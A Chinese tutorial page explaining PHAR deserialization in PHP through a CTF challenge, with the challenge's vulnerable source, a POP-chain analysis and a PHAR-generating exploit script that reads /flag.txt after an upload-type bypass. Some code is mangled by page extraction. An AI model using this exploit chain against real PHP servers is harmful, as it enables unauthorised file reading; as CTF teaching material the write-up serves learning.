PHP开发技巧之PHAR反序列化详解

引文

之前将PHP反序列化的基础知识讲了一遍,不知道大家学习的怎么样了,今天给大家带来PHP反序列化的进阶知识:PHAR反序列化,也是之前本人在CTF比赛中经常遇到的一种php反序列化的进阶使用吧,下面先给大家讲一讲PHAR反序列化的前置知识。

前置知识

PHAR

在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发。phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容,这里就是我们反序列化漏洞的利用点。

接下来带大家看一下如何构造phar文件:

PHAR状态是只读的,创建一个的Phar文件需要允许写入Phar文件,这需要修改一下:

1
php.ini:phar.readonly = Off;  #php版本要大于等于5.2

其中php.ini为php的配置文件。

PHAR文件结构

上面简单介绍了phar的基本定义,接下来我们学习一下PHAR文件的基本结构:

A stub

phar文件的标志,具体代码为:

1
xxx<!--?php xxx; __HALT_COMPILER();?-->

注意的是phar文件始终要以__HALT_COMPILER();?>来进行结尾才能被识别为PHAR文件。

A manifest describing the contents

以序列化的形式存储用户自定义的meta-data,也是我们利用反序列化漏洞的点。

The file contents

压缩的文件内容。

signature

签名信息,放在文件末尾。

PHAR文件生成样例

了解了以上信息,我们就可以尝试来构建一个PHAR文件的生成,样例代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
<!--?php class User{
        var $name;
    }
    @unlink("XINO.phar");
    $phar = new Phar("XINO.phar");
    $phar--->startBuffering();
    $phar->setStub("<!--?php __HALT_COMPILER(); ?-->");
    $o = new User();
    $o->name = "XINO";
    $phar->setMetadata($o);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
?>

运行之后结果如下:

成功生成了名为XINO.phar的phar类型文件,我们放进010editor查看:

看到 meta-data 序列化的内容成功的保存到了文件中。我们再用phar协议去读取就好了。这里需要注意的一点是:一些文件函数 通过 phar:// 伪协议解析phar文件时都会将meta-data反序列化,例如:

1
2
3
4
fileatime    filectime        filemtime    file_exists    file_get_contents    file_put_contents
file         filegroup        fopen        fileinode      fileowner            fileperms
is_dir       is_file          is_link      is_executable  is_readable          is_writeable
is_wirtble   parse_ini_file   copy         unlink         stat                 readfile        info_file  

实战

学完上面的内容后,我们便可以尝试一下实战了,先看看利用条件:

phar文件要能够上传到服务器端

要有可用的魔术方法作为”跳板”

文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤

下面我们来看一个例题:

进去是一个登陆界面,我们注册登陆进去,发现了一个文件上传的点。要求得文件类型只能是gif/jpg/png的类型,需要抓包更改其Content-Type为image/jpeg或其它图片格式的对应字符串。抓包后会发现POST传参download处存在任意文件下载:

下载源码:index.php,delete.php,download.php,class.php

class.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
<!--?php error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
    public $db;
    public function __construct() {
        global $db;
        $this--->db = $db;
    }
    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }
    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }
    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }
    public function __destruct() {
        $this->db->close();
    }
}
class FileList {
    private $files;
    private $results;
    private $funcs;
    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);
        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);
        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive">';
        $table .= '';
        foreach ($this->funcs as $func) {
            $table .= '';
        }
        $table .= '';
        $table .= '';
        foreach ($this->results as $filename => $result) {
            $table .= '';
            foreach ($result as $func => $value) {
                $table .= '';
            }
            $table .= '';
            $table .= '';
        }
        echo $table;
    }
}
class File {
    public $filename;
    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    public function name() {
        return basename($this->filename);
    }
    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        for ($i = 0; $size >= 1024 && $i filename);
    }
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>
 
<p>delete.php</p><div class="jb51code"><pre class="brush:php;"><!--?php #delete.php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
if (!isset($_POST['filename'])) {
    die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file--->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>
</pre>
</div><p>简单分析一下:</p><p>创建一个user的对象,而且db变量是一个FileList对象,文件名为flag的路径。这样的话,当user对象销毁时,db变量的close方法被执行;而db变量没有close方法,这样就会触发call魔术方法(不理解的可以去看之前的文章),于是执行File对象的close方法。通过分析FileList类的析构方法可以知道,close方法执行后存在results变量里的结果会加入到table变量中被打印出来,也就是flag会被打印出来(<code>$this->filename=flag文件</code> )。</p><p>于是我们尝试写一个生成PHAR文件的脚本:</p><div class="jb51code">
<pre class="brush:php;"><!--?php class User {
    public $db;
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file--->filename = "/flag.txt";
        $this->files = array($file);
    }
}
$a = new User();
$a->db = new FileList();
$phar = new Phar("XINO.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->addFromString("exp.txt", "test"); //添加要压缩的文件
$phar->setStub("<!--?php __HALT_COMPILER(); ?-->"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
//签名自动计算
$phar->stopBuffering();
?>
</pre>
</div><p>生成文件后将PHAR文件改文件类型然后上传,之后用PHAR协议去读取就可以得到flag。</p><p style="text-align:center"><img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-da4ef2e15f9f9b1cb66ca0993cf14e3e.png"></p><p class="maodian"><a name="_label3"></a></p><h2>结语</h2><p>今天比较详细的讲了PHAR反序列化漏洞的原理以及应用方法,可能刚开始学不太好理解,可以根据之前PHP反序列化的思路去理解一下。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。</p><p>以上就是PHP开发技巧之PHAR反序列化详解的详细内容,更多关于PHP开发PHAR反序列化的资料请关注IT俱乐部其它相关文章!</p><div class="lbd_bot clearfix">
                            <span id="art_bot" class="jbTestPos"></span>
                        </div><div class="tags clearfix">
                            <i class="icon-tag"></i><p></p>
<ul class="meta-tags">
<li class="tag item"><a href="http://common.jb51.net/tag/PHP/1.htm" target="_blank" title="搜索关于PHP的文章" rel="nofollow noopener">PHP</a></li>
<li class="tag item"><a href="http://common.jb51.net/tag/PHAR/1.htm" target="_blank" title="搜索关于PHAR的文章" rel="nofollow noopener">PHAR</a></li>
<li class="tag item"><a href="http://common.jb51.net/tag/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1.htm" target="_blank" title="搜索关于反序列化的文章" rel="nofollow noopener">反序列化</a></li>
</ul>
</div><div class="lbd clearfix">
                            <span id="art_down" class="jbTestPos"></span>
                        </div><div id="shoucang"></div><div class="xgcomm clearfix">
<h2>相关文章</h2>
<ul>
<li class="lbd clearfix"><span id="art_xg" class="jbTestPos"></span></li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/59390.htm" title="Thinkphp中的curd应用实用要点" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-1a1b05c64693fbf380aa1344a7812747.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/59390.htm" title="Thinkphp中的curd应用实用要点" rel="noopener">Thinkphp中的curd应用实用要点</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了Thinkphp中的curd应用实用要点并附上了简单的示例,是篇非常不错的文章,这里推荐给大家。</div>
<p><span class="lbtn" style="float:right"> 2015-01-01 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/59549.htm" title="PHP中使用SimpleXML检查XML文件结构实例" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-4f55910a645b073bc4fc65dc10dc14bd.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/59549.htm" title="PHP中使用SimpleXML检查XML文件结构实例" rel="noopener">PHP中使用SimpleXML检查XML文件结构实例</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了PHP中使用SimpleXML检查XML文件结构实例,本文讲解使用SimpleXML来检查一个XML文件是否符合规范的方法,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2015-01-01 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/55455.htm" title="PHP中exec与system用法区别分析" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-0ea3c7666119d5615e582f823fb3fad6.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/55455.htm" title="PHP中exec与system用法区别分析" rel="noopener">PHP中exec与system用法区别分析</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了PHP中exec与system用法区别分析,有助于深入掌握PHP程序设计,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2014-09-09 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/70798.htm" title="php自动识别文字编码并转换为目标编码的方法" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-4f96a78db829b1556ff16de21e013c7a.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/70798.htm" title="php自动识别文字编码并转换为目标编码的方法" rel="noopener">php自动识别文字编码并转换为目标编码的方法</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了php自动识别文字编码并转换为目标编码的方法,涉及php针对当前编码的判断与对应的编码转换实现技巧,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2015-08-08 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/212065.htm" title="你真的了解PHP中的引用符号(&)吗" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-8cc1031babc6aff2319f1c6af8544aa0.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/212065.htm" title="你真的了解PHP中的引用符号(&)吗" rel="noopener">你真的了解PHP中的引用符号(&)吗</a></p>
<div class="item-info">
<div class="js">php的引用就是在变量或者函数、对象等前面加上&符号,但PHP中的&符号你真的了解吗?真的会用吗?下面随着小编来一起学习学习吧</div>
<p><span class="lbtn" style="float:right"> 2021-05-05 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/57529.htm" title="PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-0c932a99bb7b6f23c937db507070cc7b.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/57529.htm" title="PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结" rel="noopener">PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了PHP遍历目录函数opendir()、readdir()、closedir()、rewinddir()总结,并给出了一个综合使用这些函数的例子做了一个简易文件浏览器,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2014-11-11 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/24137.htm" title="Apache 配置详解(最好的APACHE配置教程)" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-cca732bf65a93ed2ec0ac80c638460fe.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/24137.htm" title="Apache 配置详解(最好的APACHE配置教程)" rel="noopener">Apache 配置详解(最好的APACHE配置教程)</a></p>
<div class="item-info">
<div class="js">Apache的配置由httpd.conf文件配置,因此下面的配置指令都是在httpd.conf文件中修改。
</div>
<p><span class="lbtn" style="float:right"> 2010-07-07 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/223302.htm" title="PHP操作MySQL的常用代码段梳理与总结" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-2d9f31f2af7b675a3d153d2b7f1035a7.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/223302.htm" title="PHP操作MySQL的常用代码段梳理与总结" rel="noopener">PHP操作MySQL的常用代码段梳理与总结</a></p>
<div class="item-info">
<div class="js">MySQL时我们常会使用的数据库语言,关于PHP操作MySQL的常用代码段小编汇总整理了一遍,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以收藏下</div>
<p><span class="lbtn" style="float:right"> 2021-09-09 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/95109.htm" title="php封装的表单验证类完整实例" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-b452cee8ec5cd9e58ab98eba17281e59.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/95109.htm" title="php封装的表单验证类完整实例" rel="noopener">php封装的表单验证类完整实例</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了php封装的表单验证类,结合完整实例形式分析了php针对表单元素正则验证与类型判定的相关操作技巧,对于php程序设计的安全性有一定参考借鉴价值,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2016-10-10 </span>
</p></div>
</div>
</div>
</div>
</li>
<li>
<div class="item-inner">
<a href="https://www.2it.club/article/60381.htm" title="分享下php5类中三种数据类型的区别" class="img-wrap" target="_blank" rel="noopener"> <img decoding="async" src="https://www.2it.club/wp-content/uploads/2023/01/frc-f4838ec7e2d4da28e0b57d4e852dadd4.png"></a><p></p>
<div class="rbox">
<div class="rbox-inner">
<p><a class="link title" target="_blank" href="https://www.2it.club/article/60381.htm" title="分享下php5类中三种数据类型的区别" rel="noopener">分享下php5类中三种数据类型的区别</a></p>
<div class="item-info">
<div class="js">这篇文章主要介绍了php5类中三种数据类型的区别,需要的朋友可以参考下</div>
<p><span class="lbtn" style="float:right"> 2015-01-01 </span>
</p></div>
</div>
</div>
</div>
</li>
</ul>
</div><div class="lbd clearfix mt5">
                            <span id="art_down2" class="jbTestPos"></span>
                        </div><p>                        <a href=""></a></p><div id="comments">
<h2>最新评论</h2>
<div class="pd5">
<div id="SOHUCS" sid="art_264624"></div>
<p></p></div>
<p></p></div><div class="main-right">
<div id="sidebar-right">
<div class="r300 clearfix"><span id="side_up" class="jbTestPos"></span></div>
<div class="sidebox-recomm"></div>
<div class="r300 clearfix"><span id="zbafer" class="jbTestPos"></span></div>
<div class="sidebox bor-blue">
<div class="bor-default pb10">
<h4 class="blue">大家感兴趣的内容</h4>
<ul class="newsList newList-in">
<li>
<em class="no1">1</em><a href="https://www.2it.club/article/30489.htm" title="php中json_decode()和json_encode()的使用方法" target="_blank" rel="noopener">php中json_decode()和json_encode(</a>
</li>
<li>
<em class="no2">2</em><a href="https://www.2it.club/article/35077.htm" title="PHP 数组和字符串互相转换实现方法" target="_blank" rel="noopener">PHP 数组和字符串互相转换实现方法</a>
</li>
<li>
<em class="no3">3</em><a href="https://www.2it.club/article/138190.htm" title="php 字符串中是否包含指定字符串的多种方法" target="_blank" rel="noopener">php 字符串中是否包含指定字符串的多种方法</a>
</li>
<li>
<em class="no4">4</em><a href="https://www.2it.club/article/34745.htm" title="PHP中使用cURL实现Get和Post请求的方法" target="_blank" rel="noopener">PHP中使用cURL实现Get和Post请求的方法</a>
</li>
<li>
<em class="no5">5</em><a href="https://www.2it.club/article/14530.htm" title="php中iconv函数使用方法" target="_blank" rel="noopener">php中iconv函数使用方法</a>
</li>
<li>
<em class="no6">6</em><a href="https://www.2it.club/article/30810.htm" title="php日期转时间戳,指定日期转换成时间戳" target="_blank" rel="noopener">php日期转时间戳,指定日期转换成时间戳</a>
</li>
<li>
<em class="no7">7</em><a href="https://www.2it.club/article/19011.htm" title="PHP 页面跳转到另一个页面的多种方法方法总结" target="_blank" rel="noopener">PHP 页面跳转到另一个页面的多种方法方法总结</a>
</li>
<li>
<em class="no8">8</em><a href="https://www.2it.club/article/28864.htm" title="PHP中文处理 中文字符串截取(mb_substr)和获取中文字符串字数" target="_blank" rel="noopener">PHP中文处理 中文字符串截取(mb_substr)和获取中</a>
</li>
<li>
<em class="no9">9</em><a href="https://www.2it.club/article/15174.htm" title="php下intval()和(int)转换使用与区别" target="_blank" rel="noopener">php下intval()和(int)转换使用与区别</a>
</li>
<li>
<em class="no10">10</em><a href="https://www.2it.club/article/43737.htm" title="利用phpExcel实现Excel数据的导入导出(全步骤详细解析)" target="_blank" rel="noopener">利用phpExcel实现Excel数据的导入导出(全步骤详细</a>
</li>
</ul>
</div></div>
<div class="r300 clearfix mt10"><span id="idctu" class="jbTestPos"></span></div>
<div class="sidebox bor-blue">
<div class="bor-default pb10">
<h4 class="blue">最近更新的内容</h4>
<ul class="newsListA">
<li><a href="https://www.2it.club/article/27337.htm" title="PHP网站备份程序代码分享" target="_blank" rel="noopener">PHP网站备份程序代码分享</a></li>
<li><a href="https://www.2it.club/article/126023.htm" title="PHP实现的贪婪算法实例" target="_blank" rel="noopener">PHP实现的贪婪算法实例</a></li>
<li><a href="https://www.2it.club/article/145660.htm" title="php使用curl_init()和curl_multi_init()多线程的速度比较详解" target="_blank" rel="noopener">php使用curl_init()和curl_multi_init()多线程的</a></li>
<li><a href="https://www.2it.club/article/117755.htm" title="PHP处理bmp格式图片的方法分析" target="_blank" rel="noopener">PHP处理bmp格式图片的方法分析</a></li>
<li><a href="https://www.2it.club/article/54916.htm" title="PHP数组排序之sort、asort与ksort用法实例" target="_blank" rel="noopener">PHP数组排序之sort、asort与ksort用法实例</a></li>
<li><a href="https://www.2it.club/article/88140.htm" title="PHP登录验证码的实现与使用方法" target="_blank" rel="noopener">PHP登录验证码的实现与使用方法</a></li>
<li><a href="https://www.2it.club/article/158289.htm" title="PHP设计模式之PHP迭代器模式讲解" target="_blank" rel="noopener">PHP设计模式之PHP迭代器模式讲解</a></li>
<li><a href="https://www.2it.club/article/75389.htm" title="php实现遍历多维数组的方法" target="_blank" rel="noopener">php实现遍历多维数组的方法</a></li>
<li><a href="https://www.2it.club/article/28861.htm" title="PHP及Zend Engine的线程安全模型分析" target="_blank" rel="noopener">PHP及Zend Engine的线程安全模型分析</a></li>
<li><a href="https://www.2it.club/article/244064.htm" title="Ezpop pop序列化链反序列化知识" target="_blank" rel="noopener">Ezpop pop序列化链反序列化知识</a></li>
</ul>
</div></div>
<div class="r300 clearfix mt10">
                            <span id="idctu1" class="jbTestPos"></span>
                        </div>
<div class="sidebox bor-blue">
<div class="bor-default pb10">
<h4 class="blue">常用在线小工具</h4>
<ul class="newsListA"><span id="bctools" class="jbTestPos"></span></ul>
</div></div>
<div class="r300 clearfix mt10"><span id="idctu2" class="jbTestPos"></span></div>
<div class="mt10 rFixedBox">
<div class="r300 clearfix"><span id="r2gg" class="jbTestPos"></span></div>
<div class="r300 clearfix mt10">
                                <span id="rbbd" class="jbTestPos"></span>
                            </div>
<p></p></div>
<p></p></div>
<p></p></div><div id="right-share">
<div class="right-share jb-share" id="jb-share">
                <a class="rshare-weixin" title="">微信</a><br>
                <a rel="nofollow noopener" class="rshare-qzone" target="_blank" href="http://tougao.jb51.net/" title="投稿">投稿</a><br>
                <a rel="nofollow noopener" class="rshare-sqq" target="_blank" href="https://task.jb51.net/" title="脚本任务">脚本任务</a><br>
                <a rel="nofollow noopener" class="rshare-tsina" target="_blank" href="http://tools.jb51.net/" title="在线工具">在线工具</a>
            </div>
<p>            <a class="rshare-top" onclick="javascript:;"></a></p>
<div id="weixin-code" class="hide">
<div class="popup_weixin_head">
<p>关注微信公众号</p>
<p></p></div>
<p></p></div>
<p></p></div><div class="AutoCatelog">
<div class="AutoCatelogLlist" id="CatelogList" style="display:none"></div>
<p></p></div><div id="footer">
<div class="footer-bottom">
<p>
                <a rel="nofollow noopener" href="https://www.2it.club/about.htm" target="_blank">关于我们</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/support.htm" target="_blank">广告合作</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/linkus.htm" target="_blank">联系我们</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/sm.htm" target="_blank">免责声明</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/sitemap.htm" target="_blank">网站地图</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/article/tencent://message/?uin=461478385&Site=https://www.2it.club" target="_blank">投诉建议</a> -<br>
                <a rel="nofollow noopener" href="https://www.2it.club/up.htm" target="_blank">在线投稿</a>
            </p>
<p>©CopyRight 2006-2022 JB51.Net Inc All Rights Reserved. IT俱乐部 版权所有</p>
<p></p></div>
<p></p></div><p>    <script type="text/javascript">
        var ourl = "https://juejin.cn/post/7152298620656549896";
    </script><link type="text/css" rel="stylesheet" href="/jslib/syntaxhighlighter/styles/shCore.css">
<link type="text/css" rel="Stylesheet" href="/jslib/syntaxhighlighter/styles/shThemeDefault.css">
<script type="text/javascript" src="/jslib/syntaxhighlighter/scripts2022/shHighlighter.js"></script><script type="text/javascript">
        /*更多导航*/
        $("#nav p").hover(function() {
            $(this).addClass("hover")
        }, function() {
            $(this).removeClass("hover")
        });
        if (top.location != self.location) top.location = self.location;
        var varwindow = $(window);
        $('#content').find('img').each(function() {
            var img = this;
            if (img.width >= 800 && !$(this).hasClass("nohref")) {
                img.style.width = "800px";
                img.style.height = "auto";
            }
        });</p>
<p>        function sideFixed() {
            var scrolltop = document.body.scrollTop || document.documentElement.scrollTop;
            if (ww > 440) {
                if (550 <= scrolltop){
                    $('#right-share').slideDown();
                } else {
                    $('#right-share').slideUp();
                }
                if(suoyin=='ok'&&typeof cataloguetop=='number'){
                    if (cataloguetop <= scrolltop){
                        //$('#navCategory').css('visibility','hidden');
                        $('#CatelogList').fadeIn();
                    } else {
                        //$('#navCategory').css('visibility','visible');
                        $('#CatelogList').fadeOut();
                    }
                }
            }
        }
        var ww = varwindow.width();
         
        $('#right-share').addClass('lefts');
        if(suoyin=='ok'){
            $(window).resize(function() {
                show_suoyin();
            });
            var cataloguetop=$('#navCategory').offset().top+$('#navCategory').outerHeight();
            show_suoyin();
            $(function(){
                cataloguetop=$('#navCategory').offset().top+$('#navCategory').outerHeight();
            })
        }
         
        $(window).scroll(function() {
            //rFixedBox跟随滚动
            var h = varwindow.height();
            var top = varwindow.scrollTop();
            var rFixedBox = $('.rFixedBox').prev().offset();
            var fixedTop = rFixedBox.top;
 
            if (top >= fixedTop + 330) {
                var h1 = parseInt($('#content').children('.main').height());
                $('.rFixedBox').css({
                    'position': 'fixed',
                    'top': 0
                });
            } else {
                $('.rFixedBox').css({
                    'position': 'static',
                    'top': 0
                });
            }
            /* return true;*/</p>
<p>            /*右侧快捷菜单*/
            sideFixed();
        });
        $(window).scroll();</p>
<p>        $('.rshare-weixin').hover(function() {
            $('#weixin-code').removeClass('hide');
        }, function() {
            $('#weixin-code').addClass('hide');
        });
        /*二维码*/
        $('#right-share .rshare-top').on('click', function() {
            $('html,body').animate({
                'scrollTop': 0
            }, 500);
        });</p>
<p>        function show_suoyin() {
            var vww = 0;
            vww = varwindow.width();</p>
<p>            if (suoyin == "ok") {
                if (vww > 1600) {
                    var catell = document.getElementById("CatelogList");</p>
<p>                    if (vww < 1920) {
                        catell.style.width = (((vww - 1200) / 2) - 20) + "px";
                    } else {
                        catell.style.width = "340px";
                    }
 
                    if (!window.suoyinobj) {
                        window.suoyinobj = new katelog({
                            contentEl: 'content',
                            catelogEl: 'CatelogList',
                            linkClass: 'AutoCatelogLink',
                            linkActiveClass: 'CatelogActive',
                            supplyTop: 20,
                            selector: ['h2', 'h3', 'h4'],
                            active: function(el) {
                                //console.log(el);
                            }
                        });
                    }
                } else {
                    window.suoyinobj = null;
                    //GenerateContentList();
                }
            }
        }
 
        SyntaxHighlighter.autoloader(
            'applescript            /jslib/syntaxhighlighter/scripts2022/shBrushAppleScript.js',
            'actionscript3 as3      /jslib/syntaxhighlighter/scripts2022/shBrushAS3.js',
            'bash shell             /jslib/syntaxhighlighter/scripts2022/shBrushBash.js',
            'coldfusion cf          /jslib/syntaxhighlighter/scripts2022/shBrushColdFusion.js',
            'cpp c                  /jslib/syntaxhighlighter/scripts2022/shBrushCpp.js',
            'obj-c objc             /jslib/syntaxhighlighter/scripts2022/shBrushObjC.js',
            'c# c-sharp csharp      /jslib/syntaxhighlighter/scripts2022/shBrushCSharp.js',
            'css                    /jslib/syntaxhighlighter/scripts2022/shBrushCss.js',
            'delphi pascal          /jslib/syntaxhighlighter/scripts2022/shBrushDelphi.js',
            'diff patch pas         /jslib/syntaxhighlighter/scripts2022/shBrushDiff.js',
